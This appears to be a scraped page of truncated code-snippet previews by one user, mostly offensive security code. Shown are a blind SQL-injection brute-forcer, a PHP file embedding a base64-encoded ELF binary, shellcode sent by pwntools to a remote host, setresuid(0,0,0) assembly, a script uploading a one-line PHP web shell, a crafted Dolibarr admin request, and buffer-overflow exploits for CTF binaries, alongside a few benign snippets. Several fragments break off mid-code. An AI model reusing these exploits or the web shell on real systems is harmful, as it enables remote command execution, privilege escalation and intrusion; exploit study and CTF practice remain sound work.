sharpicx

import time
import requests
import string

characters = string.ascii_letters + string.digits
ascii_values = [ord(char) for char in characters]
pos = 1
database_name = ''
searching = True

sharpicx

<?php
$hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAIARAAAAAAAAAAAAAEAAOAAHAEAAGwAaAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAA

sharpicx

from pwn import *

context(arch="i386", os="linux", log_level="debug")
r = remote("192.168.1.100", 12321)

bin_sh = b""
bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4"
bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04"
bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06"
bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60"

sharpicx

const axios = require("axios");
const readline = require("readline");
const cheerio = require("cheerio");

const colors = {
  reset: "\x1b[0m",
  bright: "\x1b[1m",
  dim: "\x1b[2m",
  underscore: "\x1b[4m",
  blink: "\x1b[5m",

sharpicx

section .text
    global main

main:
    xor     eax, eax
    xor     ebx, ebx
    xor     ecx, ecx
    xor     edx, edx
    mov     al, 0xd0
    int     0x80       ; setresuid(0, 0, 0)

sharpicx

import requests
import random
import string

def upload_txt_file(file_name):
    file_data = "<?=`$_POST[0]`?>"
    upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
    files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
    data = {"cmd": "upload", "target": "l1_Lw"}
    response = requests.post(upload_uri, files=files, data=data)

sharpicx

from twikit import Client
import json
import pandas as pd
import itertools

USERNAME = 'username here'
EMAIL = 'email here'
PASSWORD = 'password here'

client = Client('en-US')

sharpicx

POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close

sharpicx

from pwn import *

context(arch='amd64', os='linux', log_level='DEBUG')

e = ELF('./pubg')
p = e.process()

offset = 96

p.recvuntil(b"coordinate: ")

sharpicx

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
e = ELF('./pwnme', checksec=True)
p = e.process()

offset = 268
p.sendline(("A" * offset) + "\xef\xbe\xad\xde")
p.interactive()
p.close()